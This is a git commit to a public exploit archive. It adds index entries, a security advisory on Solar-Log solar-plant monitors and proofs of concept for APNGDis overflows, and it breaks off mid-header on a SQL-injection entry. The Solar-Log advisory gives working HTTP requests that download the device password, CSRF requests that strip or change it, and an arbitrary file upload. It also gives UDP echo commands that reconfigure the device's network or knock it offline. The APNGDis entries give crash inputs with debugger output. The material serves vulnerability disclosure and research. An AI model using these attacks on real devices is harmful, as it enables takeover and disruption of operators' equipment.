From 8b5b662af977e7d922bc16df4032d7e73eaa5c13 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 23 Mar 2017 05:01:16 +0000 Subject: [PATCH] DB: 2017-03-23 8 new exploits SpyCamLizard 1.230 - Denial of Service APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow APNGDis 2.8 - 'filename' Stack Buffer Overflow Disk Sorter Enterprise 9.5.12 - 'GET' Buffer Overflow (SEH) SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit) GLink Word Link Script 1.2.3 - SQL Injection Solare Datensysteme Solar-Log Devices 2.8.4-56 / 3.5.2-85 - Multiple Vulnerabilities --- files.csv | 8 + platforms/hardware/webapps/41671.txt | 296 +++++++++++++++++++++++++++ platforms/multiple/dos/41668.txt | 62 ++++++ platforms/multiple/dos/41669.txt | 147 +++++++++++++ platforms/multiple/dos/41670.txt | 96 +++++++++ platforms/php/webapps/41665.txt | 24 +++ platforms/windows/dos/41667.py | 36 ++++ platforms/windows/remote/41666.py | 85 ++++++++ platforms/windows/remote/41672.rb | 80 ++++++++ 9 files changed, 834 insertions(+) create mode 100755 platforms/hardware/webapps/41671.txt create mode 100755 platforms/multiple/dos/41668.txt create mode 100755 platforms/multiple/dos/41669.txt create mode 100755 platforms/multiple/dos/41670.txt create mode 100755 platforms/php/webapps/41665.txt create mode 100755 platforms/windows/dos/41667.py create mode 100755 platforms/windows/remote/41666.py create mode 100755 platforms/windows/remote/41672.rb diff --git a/files.csv b/files.csv index 16ef162cc..be69c1939 100644 --- a/files.csv +++ b/files.csv @@ -5420,6 +5420,10 @@ id,file,description,date,author,platform,type,port 41659,platforms/windows/dos/41659.txt,"Microsoft Color Management Module 'icm32.dll' - 'icm32!LHCalc3toX_Di16_Do16_Lut8_G32' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",windows,dos,0 41660,platforms/multiple/dos/41660.html,"Mozilla Firefox - 'table' Use-After-Free",2017-03-20,"Google Security Research",multiple,dos,0 41661,platforms/windows/dos/41661.html,"Microsoft Internet Explorer - 'textarea.defaultValue' Memory Disclosure (MS17-006)",2017-03-20,"Google Security Research",windows,dos,0 +41667,platforms/windows/dos/41667.py,"SpyCamLizard 1.230 - Denial of Service",2017-03-22,ScrR1pTK1dd13,windows,dos,0 +41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 +41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 +41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -15353,6 +15357,8 @@ id,file,description,date,author,platform,type,port 41613,platforms/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,windows,remote,8800 41614,platforms/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,multiple,remote,8080 41638,platforms/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,windows,remote,0 +41666,platforms/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",windows,remote,0 +41672,platforms/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-03-22,Metasploit,windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -37574,3 +37580,5 @@ id,file,description,date,author,platform,type,port 41644,platforms/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",php,webapps,80 41662,platforms/hardware/webapps/41662.py,"D-Link DGS-1510 - Multiple Vulnerabilities",2017-03-20,"Varang Amin",hardware,webapps,0 41663,platforms/php/webapps/41663.txt,"Joomla! Component Extra Search 2.2.8 - 'establename' Parameter SQL Injection",2017-03-21,"Ihsan Sencan",php,webapps,0 +41665,platforms/php/webapps/41665.txt,"GLink Word Link Script 1.2.3 - SQL Injection",2017-03-22,"Ihsan Sencan",php,webapps,0 +41671,platforms/hardware/webapps/41671.txt,"Solare Datensysteme Solar-Log Devices 2.8.4-56 / 3.5.2-85 - Multiple Vulnerabilities",2017-03-22,"SEC Consult",hardware,webapps,0 diff --git a/platforms/hardware/webapps/41671.txt b/platforms/hardware/webapps/41671.txt new file mode 100755 index 000000000..8f25e0fa0 --- /dev/null +++ b/platforms/hardware/webapps/41671.txt @@ -0,0 +1,296 @@ +SEC Consult Vulnerability Lab Security Advisory < 20170322-0 > +======================================================================= + title: Multiple vulnerabilities + product: Solare Datensysteme GmbH + Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000 + vulnerable version: Firmware 2.8.4-56 / 3.5.2-85 + fixed version: Firmware 3.5.3-86 + CVE number: - + impact: Critical + homepage: http://www.solar-log.com/de/home.html + found: 2017-01-23 + by: T. Weber (Office Vienna) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow + Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich + + https://www.sec-consult.com +======================================================================= + +Vendor description: +------------------- +"Solare Datensysteme GmbH (SDS) is headquartered in the southern German city +of Binsdorf and specialises in the development and sale of monitoring systems +for photovoltaic plants. The company was founded in 2007 by Thomas Preuhs and +Jörg Karwath and was created from the company "TOP Solare Datensysteme". This +company had been developing and selling the "SolarLogâ„¢" product range since +2005. Our core competence covers innovative products with short development +cycles and an excellent cost/performance ratio. Our developments have the +outstanding characteristics of high customer value, simple operation and +universal application without requiring time-consuming installation of +software." + +Source: http://www.solar-log.uk/gb-en/unternehmen/ueber-uns.html + + +Business recommendation: +------------------------ +SEC Consult recommends to immediately install the available firmware update +and restrict network access. + +Furthermore, this device should not be used in production until a thorough +security review has been performed by security professionals and all +identified issues have been resolved. + + +Vulnerability overview/description: +----------------------------------- +1) Unauthenticated Download of Configuration including Device-Password +This vulnerability is present at least on firmware 2.8.4-56. + +An attacker can download the configuration file without authentication and +extract the password to login to Solar-Log. Therefore, an attacker can gain +administrative access to such a device without prior authentication. + + +2) Cross-Site Request Forgery (CSRF) +This vulnerability is present at least on firmware 3.5.2-85. + +A CSRF vulnerability enables an attacker to remove/modify a password of a +device by luring an authenticated user to click on a crafted link. An attacker +is able to take over the device by exploiting this vulnerability. + + +3) Unauthenticated Arbitrary File Upload +This vulnerability is present at least on firmware 3.5.2-85. + +Any files can be uploaded on the Solar-Log by using a crafted POST request. An +attacker can start a malicious website or use the Solar-Log as share to store +any (illegal) contents. + + +4) Information Disclosure (CVE-2001-1341) +All Solar-Log devices in the current firmware versions are prone to this +information disclosure vulnerability. (2.8.4-56 / 3.5.2-85) + +The network configuration of the internal network including the gateway and +the MAC address of the device are leaked. + +All details of the IPC@CHIP from Beck IPC (https://www.beck-ipc.com/) like RTOS +version and serial number are leaked as well. + + +5) Unauthenticated Change of Network-Configuration +All Solar-Log devices in the current firmware versions are prone to this +vulnerability. (2.8.4-56 / 3.5.2-85) + +Since the Solar-Log is based on the chips of Beck IPC a UDP configuration +server is enabled by default. This server allows to change the IP configuration +over a specific UDP port. This functionality can be protected with a password, +but this is not set in the affected firmware versions. + +The MAC address, which is leaked by 4), is needed to configure the device. +An attacker can reconfigure the device without any authentication. + + +6) Unauthenticated Denial of Service +All Solar-Log devices in the current firmware versions are prone to this +vulnerability. (2.8.4-56 / 3.5.2-85) + +The Beck IPC UDP configuration server on Solar-Log device can be attacked with +arbitrary UDP packets to permanently disable the Solar-Log until a manual +reboot is triggered. + + +7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory +Potentially available in all Solar-Log devices in the current firmware +versions. (2.8.4-56 / 3.5.2-85) + +Since the "CHIPTOOL" from BECK IPC enables a developer to reprogram the chip +over the network via UDP, a missing password can also enable an attacker to do +this on a Solar-Log device. This action can lead to a simple Denial of Service +or a complex botnet of Solar-Log devices! + + +Proof of concept: +----------------- +1) Unauthenticated Download of Configuration including Device-Password +The full configuration is exposed by sending the following GET-request: +------------------------------------------------------------------------------- +GET /data/misc.dat HTTP/1.1 +Host: +[...] +------------------------------------------------------------------------------- +Since the response contains the password, an attacker can easily take +control over the device. + + +2) Cross-Site Request Forgery +By luring the user to issue the following request, the password is removed: +------------------------------------------------------------------------------- +POST /setjp HTTP/1.1 +Host: + +preval=none;postval=105;{"221":"0","223":"0","225":"1","287":"","288":{"0":"0","1":"0"},"440":"0"} +------------------------------------------------------------------------------- + +By luring the user to issue the following request, the password is modified: +------------------------------------------------------------------------------- +POST /setjp HTTP/1.1 +Host: + +preval=none;postval=105;{"221":"0","223":"1","224":"","225":"1","287":"","288":{"0":"0","1":"0"},"440":"0"} +------------------------------------------------------------------------------- + + +3) Unauthenticated Arbitrary File Upload +Any files can be uploaded by using the following POST-request: +------------------------------------------------------------------------------- +POST /menu/d_debug_db.html HTTP/1.1 +Host: +[...] +Referer: http:///menu/d_debug_db.html +Content-Type: multipart/form-data; boundary=--------301473270 +Content-Length: 341 + +----------301473270 +Content-Disposition: form-data; name="DESTINATION-PATH" + +PoC.html +----------301473270 +Content-Disposition: form-data; name="FILE-CONTENT"; filename="file.txt" +Content-Type: text/plain + + + + SEC-Test + + + + + +----------301473270 +Content-Disposition: form-data; name="L_UPLOAD" + +Hochladen +----------301473270-- +------------------------------------------------------------------------------- + +The uploaded content can be reached by this link: +http:///PoC.html + + +4) Information Disclosure (CVE-2001-1341) +This vulnerability is a known issue to IPC@CHIP since 2001. +See: http://www.securityfocus.com/bid/2767/info + +The following URL can be used to open the "ChipCfg" file on a Solar-Log device: +http:///ChipCfg + +If an attacker is in the same subnet, he can directly request this information +from the device (the device responds to multicast) with the following command: +$ echo -n "0 1 A" >/dev/udp//8001 + + +5) Unauthenticated Change of Network-Configuration +By using the following command a change of the network configuration can be +triggerd unauthenticated on UDP port 8001: +$ echo -n " 4 2 0 " >/dev/udp//8001 + +Example: +$ echo -n "001122334455 4 2 0 192.168.4.5 255.255.255.0 192.168.4.254" >/dev/udp/192.168.4.9/8001 + + +6) Unauthenticated Denial of Service +By using arbitrary null characters the IPC@CHIP can be pushed into an +undesired state: +$ echo -n " 0 DDDD\0\0" >/dev/udp//8001 + +Example: +$ echo -n "001122334455 0 192.168.4.5 255.255.255.0 192.168.4.254 DDDD\0\0" >/dev/udp/192.168.4.5/8001 + + +7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory +This action was not tested against the device. Such attack can brick the +Solar-Log. The worst case scenario would be a botnet exploiting this vulnerability. + +A network-dump of the "CHIPTOOL" would be enough to reconstruct the required +UDP packets for the attack. + + +Vulnerable / tested versions: +----------------------------- +Solar-Log 1200 - 3.5.2-85 +Solar-Log 800e - 2.8.4-56 + +Since the firmware for the other Solar-Log devices is exactly the same, +other devices with the same versions are also prone to the vulnerabilities! + + +Vendor contact timeline: +------------------------ +2017-02-02: Contacting vendor via info@solar-log.com, support@solar-log.com + and berlin@solar-log.com. +2017-02-14: Vendor responds and requests the advisory unencrypted; Sent the + advisory unencrypted to the vendor. +2017-02-20: Asked for an update. +2017-02-21: Vendor states that the patch is in development. The update will + be published before 2017-03-24. +2017-03-14: Asked for a status update. Vendor states that the update will + be available on 2017-03-21. +2017-03-20: Vendor sends release notes. New firmware version is 3.5.3 build + 86 for all affected Solar-Log devices. + Informing the vendor that the release of the advisory is set to + 2017-03-22. +2017-03-22: Public advisory release. + + +Solution: +--------- +Upgrade to firmware 3.5.3-86 +http://www.solar-log.com/de/service-support/downloads/firmware.html + + +Workaround: +----------- +Restrict network access to the devices. + + +Advisory URL: +------------- +https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow +Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://www.sec-consult.com/en/Career.htm + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://www.sec-consult.com/en/About/Contact.htm +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF T. Weber / @2017 \ No newline at end of file diff --git a/platforms/multiple/dos/41668.txt b/platforms/multiple/dos/41668.txt new file mode 100755 index 000000000..4244d034d --- /dev/null +++ b/platforms/multiple/dos/41668.txt @@ -0,0 +1,62 @@ +# Exploit Title: APNGDis chunk size descriptor Buffer Overflow +# Date: 14-03-2017 +# Exploit Author: Alwin Peppels +# Vendor Homepage: http://apngdis.sourceforge.net/ +# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ +# Version: 2.8 +# Tested on: Linux Debian / Windows 7 +# CVE : CVE-2017-6191 + + +Additional analysis: +https://www.onvio.nl/nieuws/cve-2017-6191-apngdis-chunk-size-descriptor-buffer-overflow + +POC: + +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41668.png + +The PoC contains an IHDR chunk size descriptor of 0xFFFFFFF4 + + ‰ P N G . . . . ÿ ÿ ÿ ô I H D R +89 50 4E 47 0D 0A 1A 0A FF FF FF F4 49 48 44 52 + ^ ^ ^ ^ + +Bash: + +Reading '../ihdr_chunk_size_poc.png'... +*** Error in `./apngdis': free(): invalid next size (fast): 0x00005556a08d2270 *** +======= Backtrace: ========= +/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f932b0adbcb] +/lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f932b0b3f96] +/lib/x86_64-linux-gnu/libc.so.6(+0x7778e)[0x7f932b0b478e] +./apngdis(+0x2e2f)[0x55569f636e2f] +./apngdis(+0x324f)[0x55569f63724f] +/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7f932b05d2b1] +./apngdis(+0x16ca)[0x55569f6356ca] + + +Valgrind: + +Reading '../ihdr_chunk_size_poc.png'... +==10383== Invalid write of size 4 +==10383== at 0x10B502: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:113) +==10383== by 0x109F96: load_apng(char*, std::vector >&) (apngdis.cpp:206) +==10383== by 0x10B24E: main (apngdis.cpp:498) +==10383== Address 0x5ed3370 is 0 bytes after a block of size 0 alloc'd +==10383== at 0x4C2C93F: operator new[](unsigned long) (vg_replace_malloc.c:423) +==10383== by 0x10B4ED: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:112) +==10383== by 0x109F96: load_apng(char*, std::vector >&) (apngdis.cpp:206) +==10383== by 0x10B24E: main (apngdis.cpp:498) +==10383== +==10383== Invalid write of size 1 +==10383== at 0x4C330AD: __GI_mempcpy (vg_replace_strmem.c:1518) +==10383== by 0x5B94B0D: _IO_file_xsgetn (fileops.c:1400) +==10383== by 0x5B89AA8: fread (iofread.c:38) +==10383== by 0x10B52B: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:114) +==10383== by 0x109F96: load_apng(char*, std::vector >&) (apngdis.cpp:206) +==10383== by 0x10B24E: main (apngdis.cpp:498) +==10383== Address 0x5ed338c is 28 bytes after a block of size 0 in arena "client" +==10383== + +valgrind: m_mallocfree.c:303 (get_bszB_as_is): Assertion 'bszB_lo == bszB_hi' failed. +valgrind: Heap block lo/hi size mismatch: lo = 64, hi = 90194313415. diff --git a/platforms/multiple/dos/41669.txt b/platforms/multiple/dos/41669.txt new file mode 100755 index 000000000..b607ae23d --- /dev/null +++ b/platforms/multiple/dos/41669.txt @@ -0,0 +1,147 @@ +# Exploit Title: APNGDis image width / height Buffer Overflow +# Date: 14-03-2017 +# Exploit Author: Alwin Peppels +# Vendor Homepage: http://apngdis.sourceforge.net/ +# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ +# Version: 2.8 +# Tested on: Linux Debian / Windows 7 +# CVE : CVE-2017-6192 + +Additional analysis: +https://www.onvio.nl/nieuws/cve-2017-6192-apngdis-width-height-buffer-overflow + +POC: + +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41669.png + +In the first bytes of the PoC, positions +0x10 through +0x17 are malformed to contain large values: + +‰ P N G . . . . . . . . I H D R +89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 + +. . . . . . . . +00 0F 00 00 00 0F 00 00 + +^ ^ ^ ^ ^ ^ ^ ^ + +Valgrind: + + +Reading '../w_h_chunk_poc.png'... +==10563== Invalid read of size 8 +==10563== at 0x4C30260: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017) +==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78) +==10563== by 0x10AA40: load_apng(char*, std::vector >&) (apngdis.cpp:363) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== Address 0x5edb3c8 is 28,792 bytes inside a block of size 65,593 free'd +==10563== at 0x4C2CDDB: free (vg_replace_malloc.c:530) +==10563== by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176) +==10563== by 0x10A9FD: load_apng(char*, std::vector >&) (apngdis.cpp:361) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== Block was alloc'd at +==10563== at 0x4C2BBAF: malloc (vg_replace_malloc.c:299) +==10563== by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54DAF2D: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58) +==10563== by 0x54CA2E0: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158) +==10563== by 0x10A891: load_apng(char*, std::vector >&) (apngdis.cpp:337) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== +==10563== Invalid write of size 8 +==10563== at 0x4C30265: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017) +==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78) +==10563== by 0x10AA40: load_apng(char*, std::vector >&) (apngdis.cpp:363) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== Address 0x5edbad8 is 30,600 bytes inside a block of size 65,593 free'd +==10563== at 0x4C2CDDB: free (vg_replace_malloc.c:530) +==10563== by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176) +==10563== by 0x10A9FD: load_apng(char*, std::vector >&) (apngdis.cpp:361) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== Block was alloc'd at +==10563== at 0x4C2BBAF: malloc (vg_replace_malloc.c:299) +==10563== by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54DAF2D: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58) +==10563== by 0x54CA2E0: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158) +==10563== by 0x10A891: load_apng(char*, std::vector >&) (apngdis.cpp:337) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== +==10563== Invalid read of size 8 +==10563== at 0x4C30272: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017) +==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78) +==10563== by 0x10AA40: load_apng(char*, std::vector >&) (apngdis.cpp:363) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== Address 0x5edb3b8 is 28,776 bytes inside a block of size 65,593 free'd +==10563== at 0x4C2CDDB: free (vg_replace_malloc.c:530) +==10563== by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176) +==10563== by 0x10A9FD: load_apng(char*, std::vector >&) (apngdis.cpp:361) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== Block was alloc'd at +==10563== at 0x4C2BBAF: malloc (vg_replace_malloc.c:299) +==10563== by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54DAF2D: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58) +==10563== by 0x54CA2E0: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158) +==10563== by 0x10A891: load_apng(char*, std::vector >&) (apngdis.cpp:337) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== +==10563== Invalid read of size 8 +==10563== at 0x4C30140: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017) +==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78) +==10563== by 0x10AA40: load_apng(char*, std::vector >&) (apngdis.cpp:363) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== Address 0x0 is not stack'd, malloc'd or (recently) free'd +==10563== +==10563== +==10563== Process terminating with default action of signal 11 (SIGSEGV) +==10563== Access not within mapped region at address 0x0 +==10563== at 0x4C30140: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017) +==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78) +==10563== by 0x10AA40: load_apng(char*, std::vector >&) (apngdis.cpp:363) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== If you believe this happened as a result of a stack +==10563== overflow in your program's main thread (unlikely but +==10563== possible), you can try to increase the size of the +==10563== main thread stack using the --main-stacksize= flag. +==10563== The main thread stack size used in this run was 8388608. +==10563== +==10563== HEAP SUMMARY: +==10563== in use at exit: 16,777,901 bytes in 10 blocks +==10563== total heap usage: 24 allocs, 14 frees, 16,997,058 bytes allocated +==10563== +==10563== 64 bytes in 2 blocks are definitely lost in loss record 6 of 9 +==10563== at 0x4C2C93F: operator new[](unsigned long) (vg_replace_malloc.c:423) +==10563== by 0x10B4ED: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:112) +==10563== by 0x10A24D: load_apng(char*, std::vector >&) (apngdis.cpp:244) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== +==10563== LEAK SUMMARY: +==10563== definitely lost: 64 bytes in 2 blocks +==10563== indirectly lost: 0 bytes in 0 blocks +==10563== possibly lost: 0 bytes in 0 blocks +==10563== still reachable: 16,777,837 bytes in 8 blocks +==10563== suppressed: 0 bytes in 0 blocks +==10563== Reachable blocks (those to which a pointer was found) are not shown. +==10563== To see them, rerun with: --leak-check=full --show-leak-kinds=all +==10563== +==10563== For counts of detected and suppressed errors, rerun with: -v +==10563== ERROR SUMMARY: 1028641 errors from 5 contexts (suppressed: 0 from 0) +Segmentation fault + + + + +w_h_chunk_poc.png + diff --git a/platforms/multiple/dos/41670.txt b/platforms/multiple/dos/41670.txt new file mode 100755 index 000000000..7919428c8 --- /dev/null +++ b/platforms/multiple/dos/41670.txt @@ -0,0 +1,96 @@ +# Exploit Title: APNGDis filename Buffer Overflow +# Date: 14-03-2017 +# Exploit Author: Alwin Peppels +# Vendor Homepage: http://apngdis.sourceforge.net/ +# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ +# Version: 2.8 +# Tested on: Linux Debian / Windows 7 +# CVE : CVE-2017-6191 + +Additional analysis: +https://www.onvio.nl/nieuws/cve-2017-6191-apngdis-filename-buffer-overflow + +Textbook buffer overflow; a fixed size buffer gets allocated with +szPath[256], and the first command line argument is stored without +validation. + + +int main(int argc, char** argv) +{ + unsigned int i, j; + char * szInput; + char * szOutPrefix; + char szPath[256]; + char szOut[256]; + std::vector frames; + printf("\nAPNG Disassembler 2.8\n\n"); + + if (argc > 1) + szInput = argv[1]; + else + { + printf("Usage: apngdis anim.png [name]\n"); + return 1; + } + strcpy(szPath, szInput); +} + + + + +With 'A' * 1000 as argv[1] : + + +GDB: + +Program received signal SIGSEGV, Segmentation fault. +strlen () at ../sysdeps/x86_64/strlen.S:106 +106 ../sysdeps/x86_64/strlen.S: No such file or directory. +(gdb) i r +rax 0x4141414141414141 4702111234474983745 +rbx 0x7ffff70ea600 140737338320384 +rcx 0x141 321 +rdx 0x0 0 +rsi 0x7fffffffca40 140737488341568 +rdi 0x4141414141414141 4702111234474983745 +rbp 0x7fffffffceb0 0x7fffffffceb0 +rsp 0x7fffffffc948 0x7fffffffc948 +r8 0x4141414141414141 4702111234474983745 +r9 0x9 9 +r10 0x73 115 +r11 0x7fffffffce78 140737488342648 +r12 0x555555558c9f 93824992251039 +r13 0x7fffffffcec8 140737488342728 +r14 0x0 0 +r15 0xffffffffffffffff -1 +rip 0x7ffff6dd1486 0x7ffff6dd1486 +eflags 0x10297 [ CF PF AF SF IF RF ] + + +Valgrind: + +==10685== Invalid read of size 1 +==10685== at 0x4C2EDA2: strlen (vg_replace_strmem.c:454) +==10685== by 0x5B6ADA2: vfprintf (vfprintf.c:1637) +==10685== by 0x5B711F8: printf (printf.c:33) +==10685== by 0x109F05: load_apng(char*, std::vector >&) (apngdis.cpp:200) +==10685== by 0x10B24E: main (apngdis.cpp:498) +==10685== Address 0x4141414141414141 is not stack'd, malloc'd or +(recently) free'd +==10685== +==10685== +==10685== Process terminating with default action of signal 11 (SIGSEGV) +==10685== General Protection Fault +==10685== at 0x4C2EDA2: strlen (vg_replace_strmem.c:454) +==10685== by 0x5B6ADA2: vfprintf (vfprintf.c:1637) +==10685== by 0x5B711F8: printf (printf.c:33) +==10685== by 0x109F05: load_apng(char*, std::vector >&) (apngdis.cpp:200) +==10685== by 0x10B24E: main (apngdis.cpp:498) +Reading '==10685== +==10685== HEAP SUMMARY: +==10685== in use at exit: 0 bytes in 0 blocks +==10685== total heap usage: 2 allocs, 2 frees, 73,728 bytes allocated +==10685== +==10685== All heap blocks were freed -- no leaks are possible diff --git a/platforms/php/webapps/41665.txt b/platforms/php/webapps/41665.txt new file mode 100755 index 000000000..78a0f42f6 --- /dev/null +++ b/platforms/php/webapps/41665.txt @@ -0,0 +1,24 @@ +# # # # # +# Exploit Title: GLink Word Link Script v1.2.3 - SQL Injection +# Google Dork: N/A +# Date: 22.03.2017 +# Vendor Homepage: http://www.tufat.com/ +# Software: 